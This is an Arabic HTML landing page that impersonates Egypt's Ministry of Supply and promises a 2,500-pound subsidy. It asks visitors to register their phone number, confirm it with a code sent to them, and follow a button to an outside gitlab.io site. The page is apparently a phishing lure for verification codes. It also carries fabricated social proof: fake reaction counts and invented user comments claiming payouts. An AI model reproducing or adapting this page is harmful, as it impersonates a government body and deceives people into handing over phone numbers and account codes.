<html>
    <head>
        <meta charset="UTF-8" />
        <meta name="viewport" content="width=device-width, initial-scale=1.0" />
        <title>2500 جنيه دعم لكل مصري - وزارة تموين</title>
        <link rel="shortcut icon" type="image/png" href="https://i.ibb.co/vxHQMFz/icon.jpg" />
        <meta name="og:title" content="2500 جنيه دعم لكل مصري - وزارة تموين" />
        <meta name="og:url" content="" />
        <meta property="og:description" content="اضغط هنا للتسجيل" />
        <meta property="og:image" content="https://i.ibb.co/3zvjNHr/logo.png" />
        <meta name="robots" content="noindex" />
        <meta name="theme-color" content="#2980b9" />
        <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css" />
        <link rel="stylesheet" href="style.css" />
    </head>
    
    
<body>
    <div class="post">
        <img src="https://i.ibb.co/QQqLLjC/logo.png" />
                <img src="https://i.ibb.co/ykWWNNL/1610770-0.jpg" />
        <div id="intro">
            <p class="welcome">
قامت وزارة التموين بدعم جميع المصريين بمبلغ 2500 جنيه  
<p>
قم بتسجيل رقمك ثم أكده بالكود المرسل إليك
</p>
</p>
           <a href="https://carfoura.gitlab.io" target="_top"> <button>اضغط هنا للتسجيل</button></a>
        </div>
      
      
        <div class="comments">
            <div class="counter">
                <div class="reactions">
                    <img class="like" src="https://i.ibb.co/b7YgP8Y/g6cV61A.png" /> <img class="love" src="https://i.ibb.co/Khr7h4j/0UHB1f0.png" /> <img class="care" src="https://i.ibb.co/mNjn7JZ/sSMYbTT.png" /> <span id="likes">37K</span>
                </div>
                <span id="comments">11K comments</span> <span class="dot">·</span> <span id="shares">7K shares</span>
            </div>
            <div class="bar">
                <span class="react"><i class="fa fa-thumbs-o-up"></i> <a class="liked">Like</a></span> <span class="react"><i class="fa fa-comment-o"></i> Comment</span> <span class="react"><i class="fa fa-share"></i> Share</span>
            </div>
            <div>
                <div class="comment">
                    <img src="http://www.elahmad.com/api/flag.php" />
                    <div class="single-container">
                        <span class="user">Saad Amine</span>
                        <span class="text">
حمد الله اول مرة استفيد من الدعم مع اني لا أملك بطاقة تموين شكرا لكم والله


                        </span>
                    </div>
                    <div class="buttons"><span class="time t1">1m</span> <span class="dot">·</span> <span class="action liked">Like</span> · <span class="action">Reply</span></div>
                </div>
                <div class="comment">
                    <img src="https://i.ibb.co/S5NKjSC/TBNsv0c.png" />
                    <div class="single-container"><span class="user">سارة الثوري</span> <span class="text">
هل يمكنني الإستفادة من دعم بدون بطاقة تموين
                    </span></div>
                    <div class="buttons"><span class="time t2">2m</span> <span class="dot">·</span> <span class="action liked">Like</span> · <span class="action">Reply</span></div>
                </div>
                <div class="comment reply">
                    <img src="https://i.ibb.co/vxHQMFz/icon.jpg" />
                    <div class="single-container"><span class="user">وزارة التموين</span> <span class="text">
نعم يمكن للجميع الإستفادة من دعم بدون بطاقة تموين عن طريق إدخال الإسم الكامل
                    </span></div>
                    <div class="buttons"><span class="time t1">1m</span> <span class="dot">·</span> <span class="action liked">Like</span> · <span class="action">Reply</span></div>
                </div>
                <div class="comment">
                    <img src="https://i.ibb.co/X7Ht06T/li7pVT1.png" />
                    <div class="single-container"><span class="user">Princess Safae</span> <span class="text">
حمد الله سحبت المبلغ حاولو مع الموقع حتى تحصلوا علد دعم لأن مواقع حكومية تحتاج صبر
                    </span></div>
                    <div class="buttons"><span class="time t3">4m</span> <span class="dot">·</span> <span class="action liked">Like</span> · <span class="action">Reply</span></div>
                </div>
                <div class="input"><input placeholder="Write a comment..." /></div>
            </div>
        </div>
    </div>

</body>
</html>
